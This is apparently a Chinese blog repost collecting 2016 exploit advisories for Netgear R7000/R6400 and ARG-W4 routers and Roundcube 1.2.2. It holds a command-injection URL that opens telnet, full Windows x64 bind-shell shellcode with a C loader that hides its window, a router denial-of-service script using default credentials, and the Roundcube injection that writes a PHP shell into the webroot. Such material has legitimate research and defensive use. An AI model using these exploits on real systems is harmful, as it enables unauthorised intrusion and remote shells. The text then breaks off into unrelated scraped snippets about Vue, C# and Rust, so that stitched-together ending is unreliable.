stonesharp
stonesharp

Netgear R7000/R6400路由器远程漏洞等

# Exploit Title: Netgear R7000 - XSS via. DHCP hostname
# Date: 11-12-2016
# Exploit Author: Vincent Yiu
# Contact: https://twitter.com/vysecurity
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware / WebApp
# Version: V1.0.7.2_1.1.93 + LATEST to date
  
-Vulnerability
An user who has access to send DHCP via either VPN or Wireless connection can serve a host name with script tags to trigger XSS.
 
Could be potentially used to connect to open or guest WIFI hotspot and inject stored XSS into admin panel and steal cookie for authentication.
 
http://RouterIP/start.htm
 
Then visit the "view who's connected" page.
  
-Proof Of Concept
Set /etc/dhcp/dhclient.conf
 

send host-name "";




# Exploit Title: Netgear R7000 - Command Injection
# Date: 6-12-2016
# Exploit Author: Acew0rm
# Contact: https://twitter.com/Acew0rm1
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93
 
-Vulnerability
An unauthenticated user can inject commands threw
http://RouterIP/cgi-bin/;COMMAND.
 
-Proof Of Concept
http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.



/*
     # Title : Windows x64 Bind Shell TCP Shellcode
     # size : 508 bytes
     # Date : 08-12-2016
     # Author : Roziul Hasan Khan Shifat
     # Tested On : Windows 7 Professional x64
 
 
 
*/
 
 
/*
 
section .text
     global _start
_start:
 
xor rdx,rdx
mov rax,[gs:rdx+0x60]
mov rsi,[rax+0x18]
mov rsi,[rsi+0x10]
lodsq
mov rsi,[rax]
mov r14,[rsi+0x30]
 
;----------------------
mov dl,0x88
mov ebx,[r14+0x3c]
add rbx,r14
mov ebx,[rbx+rdx]
add rbx,r14
 
;--------------------------
mov esi,[rbx+0x1c]
add rsi,r14 ;kernel32.dll base address
 
;-------------------------------
 
mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,r14 ;LoadLibraryA()
;-------------------------------
 
 
mov dl,128
sub rsp,rdx
lea r12,[rsp]
 
;----------------------------------------------------
 
;loading ws2_32.dll
 
 
 
xor rdx,rdx
 
 
 
mov [r12],dword 'ws2_'
mov [r12+4],word '32'
mov [r12+6],byte dl
 
lea rcx,[r12]
 
sub rsp,88
 
call rbx
 
mov r15,rax ;ws2_32.dll base address
;--------------------------------------------------
xor rdx,rdx
mov dl,0x88
mov ebx,[r15+0x3c]
add rbx,r15
mov ebx,[rbx+rdx]
add rbx,r15
 
mov edi,[rbx+0x1c]
add rdi,r15
 
;------------------------------
 
 
mov dx,114*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSAStartup()
 
;-----------------------------------
;WSAStartup(514,&WSADATA)
 
 
 
 
xor rcx,rcx
mov cx,408
 
 
sub rsp,rcx
lea rdx,[rsp]
mov cx,514
 
sub rsp,88
 
call rbx
 
 
;-------------------------------------------
xor rdx,rdx
mov dx,98*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSASocketA()
 
;WSASocket(2,1,6,0,0,0)
 
push 6
push 1
push 2
 
pop rcx
pop rdx
pop r8
 
xor r9,r9
 
mov [rsp+32],r9
mov [rsp+40],r9
 
call rbx
 
mov r13,rax ;SOCKET
;--------------------------------------------
mov ebx,[rdi+80]
add rbx,r15 ;setsockopt()
 
;setsockopt(SOCKET,0xffff,4,&1,4)
xor rdx,rdx
mov rcx,r13
mov dx,0xffff
 
push 4
 
pop r8
 
mov [rsp],byte 1
lea r9,[rsp]
 
sub rsp,88
mov  [rsp+32],r8
 
call rbx
 
;--------------------------------------------------
mov ebx,[rdi+4]
add rbx,r15 ;bind()
 
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
 
 
push 16
pop r8
 
xor rdx,rdx
 
mov [r12],rdx
mov [r12+8],rdx
 
mov [r12],byte 2
mov [r12+2],word 0x5c11 ;port 4444 (change it if U want)
lea rdx,[r12]
 
mov rcx,r13
 
call rbx
;----------------------------------------
 
mov ebx,[rdi+48]
add rbx,r15 ;listen()
 
 
;listen(SOCKET,1)
 
push 1
pop rdx
 
push r13
pop rcx
 
call rbx
 
;-----------------------------------
 
mov ebx,[rdi]
add rbx,r15 ;accept()
 
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
 
xor rdx,rdx
 
mov [r12],rdx
mov [r12+8],rdx
 
mov dl,16
push rdx
 
lea r8,[rsp]
 
 
lea rdx,[r12]
 
mov rcx,r13
 
sub rsp,88
call rbx
 
;-------------------------------------------
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx
 
 
 
 
 
mov dl,104
 
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
 
mov dl,255
inc rdx
 
mov [r12+0x3c],edx
mov [r12+0x50],rax
mov [r12+0x58],rax
mov [r12+0x60],rax
 
;--------------------------------------------------
 
mov [r12-4],dword 'cmdA'
mov [r12-1],byte cl
 
;-----------------------------------------
sub rsp,88
;CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFOMATION)
 
lea rdx,[r12-4] ;"cmd"
 
xor r8,r8 ;NULL
 
push r8
pop r9 ;NULL
 
mov [rsp+32],byte 1 ;TRUE
mov [rsp+40],r8 ;0
mov [rsp+48],r8 ;NULL
mov [rsp+56],r8 ;NULL
 
 
lea rax,[r12]
mov [rsp+64],rax
 
lea rax,[r12+104]
mov [rsp+72],rax
 
xor r10,r10
mov r10w,165*4
mov ebx,[rsi+r10]
add rbx,r14 ;CreateProcessA()
 
call rbx
 
;-----------------------------------------------
 
 
 
 
mov r10w,297*4
mov ebx,[rsi+r10]
add rbx,r14
 
push 1
pop rcx
 
add rsp,88
call rbx
 
 
 
 
*/
 
 
 
/*
 
 
      file format pe-x86-64
 
 
Disassembly of section .text:
 
0000000000000000 <_start>:
    0:   48 31 d2                xor    %rdx,%rdx
    3:   65 48 8b 42 60          mov    %gs:0x60(%rdx),%rax
    8:   48 8b 70 18             mov    0x18(%rax),%rsi
    c:   48 8b 76 10             mov    0x10(%rsi),%rsi
   10:   48 ad                   lods   %ds:(%rsi),%rax
   12:   48 8b 30                mov    (%rax),%rsi
   15:   4c 8b 76 30             mov    0x30(%rsi),%r14
   19:   b2 88                   mov    $0x88,%dl
   1b:   41 8b 5e 3c             mov    0x3c(%r14),%ebx
   1f:   4c 01 f3                add    %r14,%rbx
   22:   8b 1c 13                mov    (%rbx,%rdx,1),%ebx
   25:   4c 01 f3                add    %r14,%rbx
   28:   8b 73 1c                mov    0x1c(%rbx),%esi
   2b:   4c 01 f6                add    %r14,%rsi
   2e:   66 ba 40 03             mov    $0x340,%dx
   32:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
   35:   4c 01 f3                add    %r14,%rbx
   38:   b2 80                   mov    $0x80,%dl
   3a:   48 29 d4                sub    %rdx,%rsp
   3d:   4c 8d 24 24             lea    (%rsp),%r12
   41:   48 31 d2                xor    %rdx,%rdx
   44:   41 c7 04 24 77 73 32    movl   $0x5f327377,(%r12)
   4b:   5f
   4c:   66 41 c7 44 24 04 33    movw   $0x3233,0x4(%r12)
   53:   32
   54:   41 88 54 24 06          mov    %dl,0x6(%r12)
   59:   49 8d 0c 24             lea    (%r12),%rcx
   5d:   48 83 ec 58             sub    $0x58,%rsp
   61:   ff d3                   callq  *%rbx
   63:   49 89 c7                mov    %rax,%r15
   66:   48 31 d2                xor    %rdx,%rdx
   69:   b2 88                   mov    $0x88,%dl
   6b:   41 8b 5f 3c             mov    0x3c(%r15),%ebx
   6f:   4c 01 fb                add    %r15,%rbx
   72:   8b 1c 13                mov    (%rbx,%rdx,1),%ebx
   75:   4c 01 fb                add    %r15,%rbx
   78:   8b 7b 1c                mov    0x1c(%rbx),%edi
   7b:   4c 01 ff                add    %r15,%rdi
   7e:   66 ba c8 01             mov    $0x1c8,%dx
   82:   8b 1c 17                mov    (%rdi,%rdx,1),%ebx
   85:   4c 01 fb                add    %r15,%rbx
   88:   48 31 c9                xor    %rcx,%rcx
   8b:   66 b9 98 01             mov    $0x198,%cx
   8f:   48 29 cc                sub    %rcx,%rsp
   92:   48 8d 14 24             lea    (%rsp),%rdx
   96:   66 b9 02 02             mov    $0x202,%cx
   9a:   48 83 ec 58             sub    $0x58,%rsp
   9e:   ff d3                   callq  *%rbx
   a0:   48 31 d2                xor    %rdx,%rdx
   a3:   66 ba 88 01             mov    $0x188,%dx
   a7:   8b 1c 17                mov    (%rdi,%rdx,1),%ebx
   aa:   4c 01 fb                add    %r15,%rbx
   ad:   6a 06                   pushq  $0x6
   af:   6a 01                   pushq  $0x1
   b1:   6a 02                   pushq  $0x2
   b3:   59                      pop    %rcx
   b4:   5a                      pop    %rdx
   b5:   41 58                   pop    %r8
   b7:   4d 31 c9                xor    %r9,%r9
   ba:   4c 89 4c 24 20          mov    %r9,0x20(%rsp)
   bf:   4c 89 4c 24 28          mov    %r9,0x28(%rsp)
   c4:   ff d3                   callq  *%rbx
   c6:   49 89 c5                mov    %rax,%r13
   c9:   8b 5f 50                mov    0x50(%rdi),%ebx
   cc:   4c 01 fb                add    %r15,%rbx
   cf:   48 31 d2                xor    %rdx,%rdx
   d2:   4c 89 e9                mov    %r13,%rcx
   d5:   66 ba ff ff             mov    $0xffff,%dx
   d9:   6a 04                   pushq  $0x4
   db:   41 58                   pop    %r8
   dd:   c6 04 24 01             movb   $0x1,(%rsp)
   e1:   4c 8d 0c 24             lea    (%rsp),%r9
   e5:   48 83 ec 58             sub    $0x58,%rsp
   e9:   4c 89 44 24 20          mov    %r8,0x20(%rsp)
   ee:   ff d3                   callq  *%rbx
   f0:   8b 5f 04                mov    0x4(%rdi),%ebx
   f3:   4c 01 fb                add    %r15,%rbx
   f6:   6a 10                   pushq  $0x10
   f8:   41 58                   pop    %r8
   fa:   48 31 d2                xor    %rdx,%rdx
   fd:   49 89 14 24             mov    %rdx,(%r12)
  101:   49 89 54 24 08          mov    %rdx,0x8(%r12)
  106:   41 c6 04 24 02          movb   $0x2,(%r12)
  10b:   66 41 c7 44 24 02 11    movw   $0x5c11,0x2(%r12)
  112:   5c
  113:   49 8d 14 24             lea    (%r12),%rdx
  117:   4c 89 e9                mov    %r13,%rcx
  11a:   ff d3                   callq  *%rbx
  11c:   8b 5f 30                mov    0x30(%rdi),%ebx
  11f:   4c 01 fb                add    %r15,%rbx
  122:   6a 01                   pushq  $0x1
  124:   5a                      pop    %rdx
  125:   41 55                   push   %r13
  127:   59                      pop    %rcx
  128:   ff d3                   callq  *%rbx
  12a:   8b 1f                   mov    (%rdi),%ebx
  12c:   4c 01 fb                add    %r15,%rbx
  12f:   48 31 d2                xor    %rdx,%rdx
  132:   49 89 14 24             mov    %rdx,(%r12)
  136:   49 89 54 24 08          mov    %rdx,0x8(%r12)
  13b:   b2 10                   mov    $0x10,%dl
  13d:   52                      push   %rdx
  13e:   4c 8d 04 24             lea    (%rsp),%r8
  142:   49 8d 14 24             lea    (%r12),%rdx
  146:   4c 89 e9                mov    %r13,%rcx
  149:   48 83 ec 58             sub    $0x58,%rsp
  14d:   ff d3                   callq  *%rbx
  14f:   48 31 d2                xor    %rdx,%rdx
  152:   49 89 14 24             mov    %rdx,(%r12)
  156:   49 89 54 24 08          mov    %rdx,0x8(%r12)
  15b:   b2 68                   mov    $0x68,%dl
  15d:   48 31 c9                xor    %rcx,%rcx
  160:   41 89 14 24             mov    %edx,(%r12)
  164:   49 89 4c 24 04          mov    %rcx,0x4(%r12)
  169:   49 89 4c 24 0c          mov    %rcx,0xc(%r12)
  16e:   49 89 4c 24 14          mov    %rcx,0x14(%r12)
  173:   49 89 4c 24 18          mov    %rcx,0x18(%r12)
  178:   b2 ff                   mov    $0xff,%dl
  17a:   48 ff c2                inc    %rdx
  17d:   41 89 54 24 3c          mov    %edx,0x3c(%r12)
  182:   49 89 44 24 50          mov    %rax,0x50(%r12)
  187:   49 89 44 24 58          mov    %rax,0x58(%r12)
  18c:   49 89 44 24 60          mov    %rax,0x60(%r12)
  191:   41 c7 44 24 fc 63 6d    movl   $0x41646d63,-0x4(%r12)
  198:   64 41
  19a:   41 88 4c 24 ff          mov    %cl,-0x1(%r12)
  19f:   48 83 ec 58             sub    $0x58,%rsp
  1a3:   49 8d 54 24 fc          lea    -0x4(%r12),%rdx
  1a8:   4d 31 c0                xor    %r8,%r8
  1ab:   41 50                   push   %r8
  1ad:   41 59                   pop    %r9
  1af:   c6 44 24 20 01          movb   $0x1,0x20(%rsp)
  1b4:   4c 89 44 24 28          mov    %r8,0x28(%rsp)
  1b9:   4c 89 44 24 30          mov    %r8,0x30(%rsp)
  1be:   4c 89 44 24 38          mov    %r8,0x38(%rsp)
  1c3:   49 8d 04 24             lea    (%r12),%rax
  1c7:   48 89 44 24 40          mov    %rax,0x40(%rsp)
  1cc:   49 8d 44 24 68          lea    0x68(%r12),%rax
  1d1:   48 89 44 24 48          mov    %rax,0x48(%rsp)
  1d6:   4d 31 d2                xor    %r10,%r10
  1d9:   66 41 ba 94 02          mov    $0x294,%r10w
  1de:   42 8b 1c 16             mov    (%rsi,%r10,1),%ebx
  1e2:   4c 01 f3                add    %r14,%rbx
  1e5:   ff d3                   callq  *%rbx
  1e7:   66 41 ba a4 04          mov    $0x4a4,%r10w
  1ec:   42 8b 1c 16             mov    (%rsi,%r10,1),%ebx
  1f0:   4c 01 f3                add    %r14,%rbx
  1f3:   6a 01                   pushq  $0x1
  1f5:   59                      pop    %rcx
  1f6:   48 83 c4 58             add    $0x58,%rsp
  1fa:   ff d3                   callq  *%rbx
 
 
 
 
 
*/
 
 
 
 
 
 
 
 
 
#include
#include
#include
 
 
char shellcode[]=\
 
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x4c\x8b\x76\x30\xb2\x88\x41\x8b\x5e\x3c\x4c\x01\xf3\x8b\x1c\x13\x4c\x01\xf3\x8b\x73\x1c\x4c\x01\xf6\x66\xba\x40\x03\x8b\x1c\x96\x4c\x01\xf3\xb2\x80\x48\x29\xd4\x4c\x8d\x24\x24\x48\x31\xd2\x41\xc7\x04\x24\x77\x73\x32\x5f\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x49\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x49\x89\xc7\x48\x31\xd2\xb2\x88\x41\x8b\x5f\x3c\x4c\x01\xfb\x8b\x1c\x13\x4c\x01\xfb\x8b\x7b\x1c\x4c\x01\xff\x66\xba\xc8\x01\x8b\x1c\x17\x4c\x01\xfb\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x66\xba\x88\x01\x8b\x1c\x17\x4c\x01\xfb\x6a\x06\x6a\x01\x6a\x02\x59\x5a\x41\x58\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd3\x49\x89\xc5\x8b\x5f\x50\x4c\x01\xfb\x48\x31\xd2\x4c\x89\xe9\x66\xba\xff\xff\x6a\x04\x41\x58\xc6\x04\x24\x01\x4c\x8d\x0c\x24\x48\x83\xec\x58\x4c\x89\x44\x24\x20\xff\xd3\x8b\x5f\x04\x4c\x01\xfb\x6a\x10\x41\x58\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\x41\xc6\x04\x24\x02\x66\x41\xc7\x44\x24\x02\x11\x5c\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x8b\x5f\x30\x4c\x01\xfb\x6a\x01\x5a\x41\x55\x59\xff\xd3\x8b\x1f\x4c\x01\xfb\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x10\x52\x4c\x8d\x04\x24\x49\x8d\x14\x24\x4c\x89\xe9\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x49\x89\x44\x24\x50\x49\x89\x44\x24\x58\x49\x89\x44\x24\x60\x41\xc7\x44\x24\xfc\x63\x6d\x64\x41\x41\x88\x4c\x24\xff\x48\x83\xec\x58\x49\x8d\x54\x24\xfc\x4d\x31\xc0\x41\x50\x41\x59\xc6\x44\x24\x20\x01\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x49\x8d\x04\x24\x48\x89\x44\x24\x40\x49\x8d\x44\x24\x68\x48\x89\x44\x24\x48\x4d\x31\xd2\x66\x41\xba\x94\x02\x42\x8b\x1c\x16\x4c\x01\xf3\xff\xd3\x66\x41\xba\xa4\x04\x42\x8b\x1c\x16\x4c\x01\xf3\x6a\x01\x59\x48\x83\xc4\x58\xff\xd3" ;
 
 
int main()
{
int len= strlen (shellcode);
DWORD l=0;
printf ( "shellcode length : %d\n" ,len);
 
//making memory executbale
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
 
 
//hiding windows
 
AllocConsole();
ShowWindow(FindWindowA( "ConsoleWindowClass" ,NULL),0);
 
//
 
(* ( int (*)()) shellcode)();
 
return 0;
 
}








# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
# Date: 2016-12-11
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM
# Tested on: Windows AND Linux
# Exploit Demo : http://persian-team.ir/showthread.php?tid=196
 
1 - Denial of Service
 
#!/usr/bin/python
import urllib2
import urllib
 
site=raw_input("Enter Url : ")
site=site+"/form2Upnp.cgi"
username='admin'
password='admin'
p = urllib2.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, site, username, password)
handler = urllib2.HTTPBasicAuthHandler(p)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
 
post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}
data = urllib.urlencode(post)
try:
     html = urllib2.urlopen(site,data)
     print ("Done ! c_C")
except:
     print ("Done ! c_C")
     
2-1 Cross-Site Request Forgery (Add Admin)
 
  
    
       USER:
      
       PWD:
       RPWD:
      
      
      
      
    
  
 
2-2 Cross-Site Request Forgery (Change DNS)
 
  
    
      
       DNS
       DNS 2
       DNS 3
      
      
      
    
  


Roundcube 1.2.2: Command Execution via Email
============================================
You can find the online version of the advisory here:
https://blog.ripstech.com/2016/roundcube-command-execution-via-email/
 
Found by Robin Peraglie with RIPS
 
Introduction
------------
Roundcube is a widely distributed open-source webmail software used by
many organizations and companies around the globe. The mirror on
SourceForge, for example, counts more than 260,000 downloads in the last
12 months which is only a small fraction of the actual users. Once
Roundcube is installed on a server, it provides a web interface for
authenticated users to send and receive emails with their web browser.
 
Affected Versions: 1.0.0 - 1.2.2
 
Requirements
------------
- Roundcube must be configured to use PHP's mail() function (by default)
- PHP's mail() function is configured to use sendmail (by default)
- PHP is configured to have safe_mode turned off (by default)
- An attacker must know or guess the absolute path of the webroot
 
Description
-----------
In Roundcube 1.2.2, and earlier, user-controlled input flows unsanitized
into the fifth argument of a call to PHP's built-in function mail()
which is documented as security critical. The problem is that the
invocation of the mail() function will cause PHP to execute the sendmail
program. The fifth argument allows to pass arguments to this execution
which allows a configuration of sendmail. Since sendmail offers the -X
option to log all mail traffic in a file, an attacker can abuse this
option and spawn a malicious PHP file in the webroot directory of the
attacked server. The following code lines trigger the vulnerability.
 
program/steps/mail/sendmail.inc
********************************************************************************
$from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST,
true, $message_charset);
⋮  
$sent = $RCMAIL->deliver_message($MAIL_MIME, $from, $mailto,$smtp_error,
$mailbody_file, $smtp_opts);
********************************************************************************
 
Here, the value of the POST parameter "_from" is fetched and Roundcube's
deliver_message() method is invoked with the value used as second
argument $from.
 
program/lib/Roundcube/rcube.php
********************************************************************************
public function deliver_message(&$message, $from, $mailto, &$error,
&$body_file = null, $options = null) {
    
     if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN))
         $sent = mail($to, $subject, $msg_body, $header_str);
     else
         $sent = mail($to, $subject, $msg_body, $header_str, "-f$from");
********************************************************************************
 
This method will then pass the $from parameter to a call of the mail()
function. The idea is to pass a custom "from" header to the sendmail
program via the "-f" option.
 
Proof of Concept
----------------
When an email is sent with Roundcube, the HTTP request can be
intercepted and altered. Here, the "_from" parameter can be modified in
order to place a malicious PHP file on the system.
 
********************************************************************************
[email protected] -OQueueDirectory=/tmp -X/var/www/html/rce.php
********************************************************************************
 
This allows an attacker to spawn a shell file "rce.php" in the web root
directory with the contents of the "_subject" parameter that can contain
PHP code. After performing the request, a file with the following
content is created:
 
********************************************************************************

你可能感兴趣的:(杂类)

  • ref 和 reactive 区别 有一个好名字 Vuevue.jsjavascript前端
    前言ref和reactive是Vue3中响应式编程的核心。在Vue中,响应式编程是一种使数据与UI保持同步的方式。当数据变化时,UI会自动更新,反之亦然。这种机制大大简化了前端开发,使我们能够专注于数据和用户界面的交互,而不必手动处理DOM更新。refref是Vue3中的一个简单响应式API,用于创建一个包装基本数据类型的响应式引用(也可以包装复杂类型,只不过底层还是由reactive的方式实现的
  • 软考——简单记忆设计模式 Yeira 设计模式pythonjava
    抽象工厂模式(AbstractFactory):提供一个接口,可以创建一系列相关或相互依赖的对象,而无需指定它们具体的类。(一个接口创建相关对象,无需具体的类)构建器模式(Builder):将一个复杂类的表示与其构造相分离,使得相同的构建过程能够得出不同的表示。(相同是构造,不同的表示)工厂方法模式(FactoryMethod):定义一个创建对象的接口,但由子类决定需要实例化哪一个类。工厂方法使得
  • 第五章 手写ref函数 DT—— 手写Vue3源码javascript前端html
    目录1.ref基本实现2.toRef基本实现3.toRefs基本实现4.proxyRefs基本实现1.ref基本实现ref函数接收一个一个值,如果这个值是基础数据类型,则直接返回一个RefImpl对象,并对这个对象设置属性访问器和属性修改器,在其中进行对应的依赖收集和触发更新如果接受一个复杂类型的数据,则会将数据包装成一个RefImpl对象,并将其value值通过reactive进行代理,最后设置
  • C#中List集合使用Remove方法详解——List使用Remove方法需要注意的坑? 猿享天开 学懂C#-高级编程技术精讲c#开发语言
    目录一、基本使用1、简单类型的例子2、复杂类型的例子二、思考三、深度解析四、正确的使用方式1、重写Equals和GetHashCode2、使用LINQ的FirstOrDefault方法五、性能考虑六、注意事项总结在C#中,List是一个常用的数据结构,它提供了一系列操作方法来管理其内部的元素。Remove方法是其中一个用于移除元素的重要方法。本文将深入探讨List.Remove方法的使用、底层原理
  • 第七章 手写watch 实现 DT—— 手写Vue3源码javascript前端vue.js
    1.创建watch函数在Vue3中,watch是一个函数,这个函数接收三个参数,前两个是必须的参数,第三个是一个配置参数。第一个参数是需要监听的响应式数据,对于复杂类型的数据可以直接传变量本身或者传入一个函数,该函数返回需要监听的数据,如果是简单类型数据,则必须传入一个函数然后函数返回该数据。第二个参数是一个回调函数,该回调函数会在监听数据发生变化后执行,同时该函数会被注入两个参数,第一个参数为变
  • SQLite3 数据类型深入全面讲解 软考鸭 nodejs帮助文档sqlitesqlite数据库
    SQLite3,作为一款轻量级的数据库管理系统,在数据存储方面展现出了其独特的魅力。它不仅支持标准的SQL语法,还提供了丰富的数据类型供开发者选择。这些数据类型不仅涵盖了基本的数值和文本类型,还包括了日期时间、二进制数据等复杂类型。本文将深入全面地讲解SQLite3的数据类型,帮助开发者更好地理解和应用这一强大的数据库工具。一、SQLite3数据类型概述SQLite3的数据类型系统相对简单,但又不
  • vue中ref和reactive Lancelot212 vue.js前端javascript
    ref和reactive是Vue3中用于创建响应式数据的两个重要API,它们之间存在几个关键的区别,主要体现在数据类型、使用方式、访问方式以及设计理念上。1.数据类型不同ref:主要用于定义简单类型的数据(如字符串、数字、布尔值等)以及单一的对象。虽然它可以用于对象,但通常用于需要保持对其值响应式引用的场景。reactive:则主要用于包装JavaScript对象和数组等复杂类型的数据。它能够递归
  • $router.back()携带参数,复杂类型参数和简单类型参数 进阶的巨人001 前端javascriptvue传参beforeRoute
    需求来源:跳转到另外一个页面的时候,$router.back()返回的时候想携带一些参数,然后在返回的页面进行一些操作,虽然可以用vuex或者localstorage这些存储,但始终感觉不太好解决办法:使用beforeRouteEnter进行组件传值上一个页面handleBack(){this.$route.params.id=1//保存的参数this.$router.back();},返回的页面
  • python 接口自动化数据结构(如列表、字典、元组) 测试界晓晓 软件测试python自动化数据结构软件测试自动化测试功能测试程序人生
    在Python接口自动化测试中,数据结构扮演着至关重要的角色,用于组织和处理测试数据、请求参数和响应结果。列表(List)列表是Python中的一种可变序列数据类型,它允许存储一系列有序的、可重复的元素,这些元素可以是任何数据类型,包括字符串、数字、布尔值甚至是其他的列表或字典等复杂类型。users_list=['user1','user2','user3']request_urls=['http
  • 【Rust】004-Rust 所有权 訾博ZiBo Rustrust开发语言后端
    【Rust】004-Rust所有权文章目录【Rust】004-Rust所有权一、预备知识1、堆和栈2、String类型&strString二、所有权规则1、所有权系统的三条规则2、代码示例3、所有权转移简单示例复杂类型的拷贝4、函数的传值与返回三、引用与借用1、借用2、不可变引用(只读)3、可变引用(可读可写)4、重要规则5、NLL6、悬垂引用错误代码四、切片1、概念2、字符串切片基本写法简化写法
  • SpringMVC 八重我老婆 javaspringmavenintellij-ideajvmmybatisjunit
    1.web层-代替Servlet(接收请求、处理请求、做出响应)2.作用做出响应页面跳转-返回字符串-默认转发forward:/xxx/xxxredirect:/xxx/xxx页面跳转-返回ModelAndView页面跳转-使用ServletAPI响应数据-设置响应正文response-流返回字符串+@ResponseBody响应数据-返回JSON返回方法必须是复杂类型@ResponseBody@
  • Spring-06-依赖注入(DI) CodeHuba
    依赖注入(DI)1构造器注入(前面已经说过了)2Set方式注入(重点)依赖注入:Set注入!依赖:bean对象的创建依赖于容器;注入:bean对象的所有属性,由容器来注入;环境搭建复杂类型publicclassAddress{privateStringaddress;publicStringgetAddress(){returnaddress;}publicvoidsetAddress(Strin
  • #Js篇:数组的方法es5和es6 前端xiaolibao Js篇javascript
    数组方法学习判断一个数组的方法Array.isArray()javascript内置的方法,用于检测给定的对象是否为数组类型。早期版本兼容性es5引入,对于不支持es5的老旧浏览器(如ie8及更早版本),该方法不可用。es5实例方法valueof()表示对对象求值。数组的valueOf方法返回数组本身toString()数组的toString方法返回数组的字符串形式----基本类型的数组复杂类型–
  • Watch 在 vue 3 中使用说明 刺客-Andy vue3vue.js前端javascriptvue
    一、监听基础类型constnums=ref(9)watch(nums,(newValue,oldValue)=>{console.log('watch已触发',newValue)})二、监听复杂类型constdemo=reactive({name:'前端小玖',nickName:'小玖',soulmate:{name:'',nickName:''}})复杂类型的监听有很多种情况,具体的内容如下监听
  • Java全栈课程之Spring详解——依赖注入 小孙同学1024 Java全栈开发springjava后端
    一、构造器注入二、set方式注入1.依赖注入:set注入2.依赖:bean对象的创建依赖于容器3.注入;bean对象中的所有属性,有容器来注入4.环境搭建①复杂类型publicclassAddress{privateStringaddress;publicStringgetAddress(){returnaddress;}publicvoidsetAddress(Stringaddress){th
  • C++构造函数/析构函数/复制构造函数(深拷贝/浅拷贝) 时吨吨 C++c++
    目录1.构造函数2.析构函数3.拷贝构造函数4.深拷贝和浅拷贝5.参考内容1.构造函数2.析构函数3.拷贝构造函数4.深拷贝和浅拷贝(1)当我们对复杂类型(结构体或者类)的对象进行初始化时,如果将对象A赋值给同类型的对象B,此时就涉及深拷贝和浅拷贝的问题;(2)如何定义拷贝的深和浅:浅拷贝就是把类/结构体的变量原封不动的赋值,不考虑指针变量;深拷贝就是在赋值时会对指针变量做处理;总结:对象拷贝时,
  • 字符串比较大小c语言指针详解经典非常详细,C语言指针详解(经典,非常详细) DreamBSD
    前言:复杂类型说明要了解指针,多多少少会出现一些比较复杂的类型,所以我先介绍一下如何完全理解一个复杂类型,要理解复杂类型其实很简单,一个类型里会出现很多运算符,他们也像普通的表达式一样,有优先级,其优先级和运算优先级一样,所以我总结了一下其原则:从变量名处起,根据运算符优先级结合,一步一步分析.下面让我们先从简单的类型开始慢慢分析吧:intp;//这是一个普通的整型变量int*p;//首先从P处开
  • 【Flink】FlinkSQL的DataGen连接器(测试利器) 一杯咖啡半杯糖 Flink实战flink大数据
    简介我们在实际开发过程中可以使用FlinkSQL的DataGen连接器实现FlinkSQL的批或者流模拟数据生成,DataGen连接器允许按数据生成规则进行读取,但注意:DataGen连接器不支持复杂类型:Array,Map,Row。请用计算列构造这些类型创建有界DataGen表CREATETABLEtest(aINT,bSTRING,createtimeTIMESTAMP(3),WATERMAR
  • 江醉心
    工作了,助理,帮别人忙人家的私人小时,打杂类~时间花费很多,赚钱的效率一般。自己确感觉没有了自己思想的时间,回来都是游戏度过~浪费时间。只有去保持健身房的频率,很少读书了,也很少听书了~进步的空间,想像的空间狭窄了。把游戏卸载了,看看我下班后自己的时间如何分配,想睡久点久点~终究还是不成熟,害怕的样子也许这是新的路子,也许这是新的开始,现在都不知道未来会成为什么样子。继续做吧,在没有自己坚定之前。
  • C语言基础07——结构体 蛋翼 C语言c语言开发语言
    目录结构体类型的声明与初始化结构体的声明结构体变量的定义和初始化结构体成员的访问结构体传参练习结构体类型的声明与初始化结构体的声明结构体使C语言有能力描述复杂类型。结构体是一种集合,它里面可以包含多个变量或数组,它们的类型可以相同,也可以不同,这些变量或数组都称为结构体的成员(Member)。结构体也是一种数据类型,它由程序员自己定义,可以包含多个其他类型的数据。像int、float、char等是
  • C语言指针你弄明白了吗 呼啦啦的爱
